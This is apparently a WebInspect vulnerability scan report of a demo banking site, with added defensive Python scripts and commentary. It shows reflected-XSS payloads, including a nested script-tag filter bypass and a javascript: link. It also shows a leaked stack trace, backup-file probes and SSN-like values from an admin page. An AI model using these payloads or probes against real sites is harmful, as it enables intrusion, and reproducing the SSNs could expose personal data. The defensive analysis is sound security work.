
HPE Security WebInspect

Duplicates
Web Application Assessment Report

Scan Name: Site: http://zero.webappsecurity.com/
Policy: Standard
Scan Date: 10/10/2016 1:19:47 PM
Scan Version: 16.10.463.10
Scan Type: Site
Crawl Sessions: 437
Vulnerabilities: 104
Scan Duration: 21 minutes : 27 seconds
Client: FF
Report Date: 10/10/2016

Critical Issues

Poor Error Handling: Unhandled Exception

Page: http://zero.webappsecurity.com:80/account/

Request:
GET /account/ HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="551A58F3CAE8D76CCDEE29CAB920CF53";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="ae34b422-6357-4aca-8fe7-7e449e14c9b7"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10220"; Engine="Directory+Enumeration";
SmartMode="NonServerSpecificOnly"; ThreadId="88"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="0dcb8edc-da07-4d15-8bb4-66a65d53899d";
X-Request-Memo: ID="50ed1642-dcbc-4d5c-8f13-cb22de7c9c32"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 500 Internal Server Error
Date: Mon, 10 Oct 2016 07:51:32 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 15269
...TRUNCATED...user lacks privilege or object not found: INDEX
at org.springframework.jdbc.support.SQLExceptionSubclassTranslator.doTranslate(SQLExceptionSubclassTranslator.java:95)
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:72)
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:80)
at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:407)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:456)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:464)
at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:472)
at com.hp.webinspect.zero.dao.impl.AccountDaoImpl.get(AccountDaoImpl.java:36)
at com.hp.webinspect.zero.service.impl.AccountServiceImpl.get(AccountServiceImpl.java:38)
at com.hp.webinspect.zero.web.controller.MobileApiController.findAccountById(MobileApiController.java:55)
at sun.reflect.GeneratedMethodAccessor221.invok...TRUNCATED...
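What the 500 response above hands an attacker is easier to see once the trace is parsed: the exception message, the persistence framework in use, and the application's own package layout down to the controller method that was reached. The script below is an added example, not part of the WebInspect report; it works on the frames shown above (the truncated sun.reflect frame is left out). The message-to-engine table is my addition: "user lacks privilege or object not found" is HSQLDB's wording for that error.

```python
"""Summarise what a leaked Java stack trace gives an attacker (added example)."""
import re
from collections import Counter

# "at pkg.Class.method(File.java:NN)" -- one frame per line.
FRAME = re.compile(r"at\s+([\w.$]+)\.([\w$<>]+)\(([\w.]+):(\d+)\)")

# Exception messages whose wording identifies the database engine.
# "user lacks privilege or object not found" is HSQLDB's text.
KNOWN_MESSAGES = {"user lacks privilege or object not found": "HSQLDB"}

# Frames copied from the /account/ response in the report.
TRACE = """user lacks privilege or object not found: INDEX
at org.springframework.jdbc.support.SQLExceptionSubclassTranslator.doTranslate(SQLExceptionSubclassTranslator.java:95)
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:72)
at org.springframework.jdbc.support.AbstractFallbackSQLExceptionTranslator.translate(AbstractFallbackSQLExceptionTranslator.java:80)
at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:407)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:456)
at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:464)
at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:472)
at com.hp.webinspect.zero.dao.impl.AccountDaoImpl.get(AccountDaoImpl.java:36)
at com.hp.webinspect.zero.service.impl.AccountServiceImpl.get(AccountServiceImpl.java:38)
at com.hp.webinspect.zero.web.controller.MobileApiController.findAccountById(MobileApiController.java:55)
"""


def parse_frames(trace: str) -> list[tuple[str, str, str, int]]:
    """(class, method, file, line) for every frame, innermost first."""
    return [(c, m, f, int(n)) for c, m, f, n in FRAME.findall(trace)]


def summarise(trace: str, app_prefix: str) -> dict:
    """Split frames into application code and third-party frameworks and
    name the HTTP entry point (the outermost application frame)."""
    frames = parse_frames(trace)
    app = [f for f in frames if f[0].startswith(app_prefix)]
    libs = Counter(".".join(f[0].split(".")[:3]) for f in frames
                   if not f[0].startswith(app_prefix))
    message = trace.strip().splitlines()[0]
    database = next((db for text, db in KNOWN_MESSAGES.items() if text in message), None)
    return {
        "message": message,
        "database": database,
        "frames": len(frames),
        "frameworks": sorted(libs),
        "app_classes": [f[0] for f in app],
        "entry_point": f"{app[-1][0]}.{app[-1][1]}" if app else None,
    }


if __name__ == "__main__":
    for key, value in summarise(TRACE, "com.hp.webinspect.zero").items():
        print(f"{key}: {value}")
```

The fix on the server side is a generic error page with the trace logged, never rendered; the point of the summary is to show how much the unfixed version gives away.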

Cross-Site Scripting: Reflected

Page: http://zero.webappsecurity.com:80/faq.html?question=1%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%34%38%36%37%29%3c%2f%73%43%72%49%70%54%3e

Request:
GET /faq.html?question=1%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%37%34%38%36%37%29%3c%2f%73%43%72%49%70%54%3e HTTP/1.1
Referer: http://zero.webappsecurity.com/faq.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="4FB1346EF67099BEF821A6F9B62A60B6";
PSID="BA7F9A211020B77EBF4F706FEDC87676"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="2";
AttackParamDesc="question"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="1%253c%2573%2543%2572%2549%2570%2554%253e%2561%256c%2565%2572%2574%2528%2537%2534%2538%2536%2537%2529%253c%252f%2573%2543%2572%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="104"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="4cd3f72c-6ab8-4d08-ad79-ecb66ce35210";
X-Request-Memo: ID="84984235-c28a-4473-8e0a-433b908b1116"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=293AB9C7
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:03:43 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Length: 7779

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - FAQ - Frequently Asked Questions</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
</div>
</div>
</div>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="offset2 span8">
<div class="row">
<div class="page-header">
<h3>Frequently Asked Questions</h3>
</div>
</div>
<div class="row">
<ol class="questions">
<li><a href="/faq.html?question=1">How can I edit my profile?</a></li>
<li><a href="/faq.html?question=2">How can I review my transaction history?</a></li>
</ol>
<hr/>
</div>
<div id="question1" class="row">
<div class="span1">
<div class="number">1</div>
</div>
<div class="span7">
<h4>How can I edit my profile?</h4>
</div>
</div>
<div class="row">
<div class="offset1 span7">
<p>
<ol>
<li>From any page, click your user name which appears at the top right corner of the site.</li>
<li>From the dropdown menu that displays, click My Profile.</li>
<li>Edit your profile.</li>
</ol>
</p>
</div>
</div>
<div id="question2" class="row">
<div class="span1">
<div class="number">2</div>
</div>
<div class="span7">
<h4>How can I review my transaction history?</h4>
</div>
</div>
<div class="row">
<div class="offset1 span7">
<p>
<ol>
<li>Click Account Activity.</li>
<li>Click the Show Transactions tab to view your most recent transactions.</li>
<li>Click the Find Transactions tab to show transactions by a date range.</li>
</ol>
</p>
</div>
</div>
</div>
</div>
<span id="current_question" class="hide"></span>
<script type="text/javascript">
function getParameterByName(name) {
var regex = new RegExp("\\?.*?=(.*)$");
var results = r
...TRUNCATED...

Page: http://zero.webappsecurity.com:80/search.html?searchTerm=12345%3c%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e%61%6c%65%72%74%28%32%31%37%38%38%29%3c%2f%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e

Request:
GET /search.html?searchTerm=12345%3c%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e%61%6c%65%72%74%28%32%31%37%38%38%29%3c%2f%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="1C7CFA469492EFFD5F19DF3B53A3FE01";
PSID="4FB1E28C3A3C661502F583F3EA8F6277"; SessionType="AuditAttack"; CrawlType="None";
AttackType="QueryParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002";
AttackSequence="12"; AttackParamDesc="searchTerm"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="12345%253c%2573%2543%2572%253c%2553%2563%2552%2569%2550%2574%253e%2549%2570%2554%253e%2561%256c%2565%2572%2574%2528%2532%2531%2537%2538%2538%2529%253c%252f%2573%2543%2572%253c%2553%2563%2552%2569%2550%2574%253e%2549%2570%2554%253e"; AttackStringProps="Attack"; ThreadId="108"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="ae8c26a7-0222-4493-aa43-7b5efc44973d";
X-Request-Memo: ID="8ac4544f-949f-45c9-bfd2-5ad0448aa9db"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:55:15 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 7739
...TRUNCATED...No results were found for the query: 12345<sCrIpT>alert(21788)</sCrIpT>
</div>
</div>
...TRUNCATED...

Cross-Site Scripting: Reflected

Page: http://zero.webappsecurity.com:80/sendFeedback.html

Request:
POST /sendFeedback.html HTTP/1.1
Referer: http://zero.webappsecurity.com/feedback.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="95C1FE21147002AFF09A188D192C8D0D";
PSID="A8191E30A6A6D05B7ECBC975A580DB55"; SessionType="AuditAttack"; CrawlType="None";
AttackType="PostParamManipulation"; OriginatingEngineID="1354e211-9d7d-4cc1-80e6-4de3fd128002"; AttackSequence="34";
AttackParamDesc="name"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="5105";
Engine="Cross+Site+Scripting"; SmartMode="NonServerSpecificOnly"; AttackString="%253c%2561%2520%2548%2572%2545%2566%253d%254a%2561%2556%2561%2553%2563%2552%2569%2550%2574%253a%2561%256c%2565%2572%2574%2528%2538%2537%2532%2538%2537%2529%253e"; AttackStringProps="Attack"; ThreadId="107";
ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="51"; smi="0"; sc="1"; ID="077f7850-8a1b-40b5-a5cf-0c3975c7f8f7";
X-Request-Memo: ID="5e7588aa-3fb4-4b6d-aeab-d98f12c94f81"; sc="1"; ThreadId="107";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=3FF9E851
name=%3c%61%20%48%72%45%66%3d%4a%61%56%61%53%63%52%69%50%74%3a%61%6c%65%72%74%28%38%37%32%38%37%29%3e&email=John.Doe%40somewhere.com&subject=12345&comment=12345&submit=Send%20Message
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:58:06 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive
Content-Length: 6674
...TRUNCATED.../div>
Thank you for your comments, <a HrEf=JaVaScRiPt:alert(87287)>.
They will be reviewed by our Custom...TRUNCATED...
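The three reflected-XSS transcripts above carry the payload in two encodings: the request line has it percent-encoded once (%3c), while the AttackString field in X-Scan-Memo has it encoded twice (%253c). Decoding them makes the reasoning behind the search.html finding visible: the request sends the nested payload `12345<sCr<ScRiPt>IpT>alert(21788)</sCr<ScRiPt>IpT>`, and the response echoes `12345<sCrIpT>alert(21788)</sCrIpT>`, which is what a blacklist that strips `<script>` tokens in a single pass leaves behind. The sendFeedback.html response echoes `<a HrEf=JaVaScRiPt:alert(87287)>` untouched. The script below is an added triage helper, not part of the report: it decodes the attacked parameter, checks whether the payload (or its once-stripped variant) lands in the response with its markup intact, and contrasts that with an HTML-escaped reflection, which is the fix. The single-pass strip filter is my model of the observed behaviour, not the application's code.

```python
"""Triage helpers for reflected-XSS scanner transcripts (added example)."""
import html
import re
from urllib.parse import parse_qs, unquote

# <script> / </script> tokens in any letter case. Models the single-pass
# strip the search.html response suggests; an assumption, not the app's code.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\s*>", re.IGNORECASE)
# Constructs a browser executes if they reach the HTML parser unescaped.
EXECUTABLE = re.compile(r"<\s*script\b|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)


def decode_attack_string(encoded: str, layers: int = 1) -> str:
    """Percent-decode `layers` times: 1 for the request line, 2 for the
    AttackString field in X-Scan-Memo."""
    for _ in range(layers):
        encoded = unquote(encoded)
    return encoded


def attacked_value(params: str, name: str) -> str:
    """Decoded value of parameter `name` from a query string or form body."""
    return parse_qs(params, keep_blank_values=True)[name][0]


def strip_script_once(value: str) -> str:
    """One pass of the naive tag blacklist. Nested tags survive it."""
    return SCRIPT_TAG.sub("", value)


def triage(params: str, name: str, body: str) -> dict:
    """Decide whether the attacked parameter is reflected unescaped.

    Reports the payload as sent, the variant found in the body (verbatim or
    after one strip pass), and whether that variant is still executable."""
    payload = attacked_value(params, name)
    for variant in (payload, strip_script_once(payload)):
        if variant in body:
            return {"payload": payload, "reflected": variant,
                    "executable": bool(EXECUTABLE.search(variant))}
    return {"payload": payload, "reflected": None, "executable": False}


# Query string, form body and response excerpts copied from the report.
SEARCH_QS = ("searchTerm=12345%3c%73%43%72%3c%53%63%52%69%50%74%3e%49%70%54%3e"
             "%61%6c%65%72%74%28%32%31%37%38%38%29%3c%2f%73%43%72%3c%53%63%52"
             "%69%50%74%3e%49%70%54%3e")
SEARCH_BODY = "No results were found for the query: 12345<sCrIpT>alert(21788)</sCrIpT>"
FEEDBACK_PARAMS = ("name=%3c%61%20%48%72%45%66%3d%4a%61%56%61%53%63%52%69%50%74"
                   "%3a%61%6c%65%72%74%28%38%37%32%38%37%29%3e"
                   "&email=John.Doe%40somewhere.com&subject=12345&comment=12345"
                   "&submit=Send%20Message")
FEEDBACK_BODY = "Thank you for your comments, <a HrEf=JaVaScRiPt:alert(87287)>."
# Constructed: the same page if it HTML-encoded `name` before echoing it.
FEEDBACK_BODY_FIXED = ("Thank you for your comments, "
                       + html.escape("<a HrEf=JaVaScRiPt:alert(87287)>", quote=True) + ".")

if __name__ == "__main__":
    print(triage(SEARCH_QS, "searchTerm", SEARCH_BODY))
    print(triage(FEEDBACK_PARAMS, "name", FEEDBACK_BODY))
    print(triage(FEEDBACK_PARAMS, "name", FEEDBACK_BODY_FIXED))
```

The faq.html finding is not checked here because the response excerpt in the report is cut off before any reflection point; the decoder alone shows that its payload is `1<sCrIpT>alert(74867)</sCrIpT>`.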

Privacy Violation: Social Security Number

Page: http://zero.webappsecurity.com:80/admin/users.html

Request:
GET /admin/users.html HTTP/1.1
Referer: http://zero.webappsecurity.com/admin/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="810BCB46E8C09C737ECDC561083681F4";
PSID="B09C4D5CC22F10C01D9D84418780B93D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="7916c964-49d2-4e52-a3d3-5fc08c602847";
X-Request-Memo: ID="3811efb9-c4e3-4c9a-a336-fae774879fd7"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=400B9B5C
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Length: 10793
...TRUNCATED...

<td>
536-48-3769
</td>
...TRUNCATED...
<td>
607-58-7435
</td>
...TRUNCATED...
<td>
247-54-1719
</td>
...TRUNCATED...
<td>
578-13-3713
</td>
...TRUNCATED...
<td>
449-20-3206
</td>
...TRUNCATED...
<td>
008-70-6738
</td>
...TRUNCATED...
<td>
574-56-1932
</td>
...TRUNCATED...
<td>
330-58-4012f1
</td>
...TRUNCATED...
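The scanner's check here is a pattern match over the response body. The script below is an added example, not the report's own logic: it applies the same idea with the structural rules the SSA publishes (area numbers 000, 666 and 900-999, group 00 and serial 0000 are never issued) and word boundaries, then masks matches down to the last four digits. Run against the cells shown above it reports seven numbers; the last cell, 330-58-4012f1, fails the boundary check, and the report does not say whether the trailing characters are the page's own content or an extraction artifact. A match only means the value is structurally valid, not that it was ever issued.

```python
"""Check an HTML response body for Social Security Numbers (added example)."""
import re

# NNN-NN-NNNN, excluding the ranges the SSA never issues: area 000, 666 and
# 900-999, group 00, serial 0000. The boundary look-arounds keep longer
# digit runs and values like "4012f1" from matching.
SSN = re.compile(
    r"(?<![\w-])(?!000|666|9\d\d)(\d{3})-(?!00)(\d{2})-(?!0000)(\d{4})(?![\w-])"
)

# Table cells as they appear in the /admin/users.html response in the report.
USERS_PAGE = """
<td>
536-48-3769
</td>
<td>
607-58-7435
</td>
<td>
247-54-1719
</td>
<td>
578-13-3713
</td>
<td>
449-20-3206
</td>
<td>
008-70-6738
</td>
<td>
574-56-1932
</td>
<td>
330-58-4012f1
</td>
"""


def find_ssns(text: str) -> list[str]:
    """Every structurally valid SSN in the text, in document order."""
    return [m.group(0) for m in SSN.finditer(text)]


def mask(text: str) -> str:
    """Replace each SSN with its last four digits only."""
    return SSN.sub(lambda m: "***-**-" + m.group(3), text)


if __name__ == "__main__":
    hits = find_ssns(USERS_PAGE)
    print(len(hits), "SSNs:", hits)
    print(mask("id 536-48-3769"))
```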

High Issues

Web Server Misconfiguration: Unprotected File

Page: http://zero.webappsecurity.com:80/server-status

Request:
GET /server-status HTTP/1.1
Referer: http://zero.webappsecurity.com/resources/js/placeholders.min.js
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="AFEDDE4F98762A991CD0720E24021F4B";
PSID="511D6DB521E43A071D015EA7E62869D3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="63a283c6-6b75-41e3-b0c2-d7b0821c2902"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="157"; Engine="Fixed"; SmartMode="ServerSpecificOnly";
ThreadId="93"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="adb6c8a9-3ecc-4eed-9292-e3eb93b4a94c";
X-Request-Memo: ID="dcce354f-9cf5-4f16-8690-e9fd962794d1"; sc="1"; ThreadId="101";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=02B64950
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:09:39 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Content-Type: text/html;charset=UTF-8
Content-Length: 5523
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
...TRUNCATED...>Apache Status</title>
</head><body>
<h1>Apache Server Status for localhost</h1>
<dl><dt>Server Version: Apache/...TRUNCATED...

Web Server Misconfiguration: Unprotected File

Page: http://zero.webappsecurity.com:80/faq.html.bak

Request:
GET /faq.html.bak HTTP/1.1
Referer: http://zero.webappsecurity.com/faq.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="429FE5A688ED304522C9927396FB35BB";
PSID="4CAE3BF452C6150F60166D67DC3B7477"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="aabf09b7-996e-479e-9ecc-9f0508d42d72"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="708"; Engine="File+Extension+Addition";
SmartMode="NonServerSpecificOnly"; ThreadId="108"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="53"; smi="0"; sc="1"; ID="d57c3e19-75ec-4505-b05a-b945e0413922";
X-Request-Memo: ID="6c8cb142-5bf7-4070-ae79-e98a8688b3f5"; sc="1"; ThreadId="108";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=2313C6AC
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:55:33 GMT
Server: ...TRUNCATED...

Web Server Misconfiguration: Unprotected File

Page: http://zero.webappsecurity.com:80/index.html.old

Request:
GET /index.html.old HTTP/1.1
Referer: http://zero.webappsecurity.com/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="7CA1E733E893A17324796A1F09B96499";
PSID="8E73B3A63EFE2AADE20745A947151EB3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="aabf09b7-996e-479e-9ecc-9f0508d42d72"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="709"; Engine="File+Extension+Addition";
SmartMode="NonServerSpecificOnly"; ThreadId="102"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="9c53cb15-2bae-477f-804f-b08e1874e1b3";
X-Request-Memo: ID="c1a4a9c0-91f0-4e42-8e01-c112a269809f"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:48 GMT
Server: ...TRUNCATED...

Web Server Misconfiguration: Unprotected File

Page: http://zero.webappsecurity.com:80/debug.txt

Request:
GET /debug.txt HTTP/1.1
Referer: http://zero.webappsecurity.com/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="29FFCB3633642C14ECBEB7D48BC76BC9";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="60b8f839-2e70-4177-8e47-f305852be435"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="1368"; Engine="Site+Search";
SmartMode="NonServerSpecificOnly"; ThreadId="83"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="45"; smi="0"; sc="1"; ID="eef16f07-aaef-4645-902f-44780fdf1682";
X-Request-Memo: ID="053e7ffe-da02-4e05-8ccb-62ad5c0377b4"; sc="1"; ThreadId="104";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:25 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"27144-1368929102000"
Last-Modified: Sun, 19 May 2013 02:05:02 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 27144
Keep-Alive:...TRUNCATED...

Web Server Misconfiguration: Unprotected File

Page: http://zero.webappsecurity.com:80/index.old

Request:
GET /index.old HTTP/1.1
Referer: http://zero.webappsecurity.com/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="6A2893E020A3F2C8D52B2408615E4102";
PSID="8E73B3A63EFE2AADE20745A947151EB3"; SessionType="AuditAttack"; CrawlType="None"; AttackType="Search";
OriginatingEngineID="9d2b8591-9dbe-4085-bc79-15aeab89cc57"; AttackSequence="0"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="2083"; Engine="File+Extension+Replacement";
SmartMode="ServerSpecificOnly"; ThreadId="103"; ThreadType="AuditorStateRequestor";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="9a50dde0-6715-4c0a-95f2-031c05a03acd";
X-Request-Memo: ID="42a2d660-c2d6-4aa6-9137-dde3b5991302"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=943C3A6B
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:09:40 GMT
Server: ...TRUNCATED...
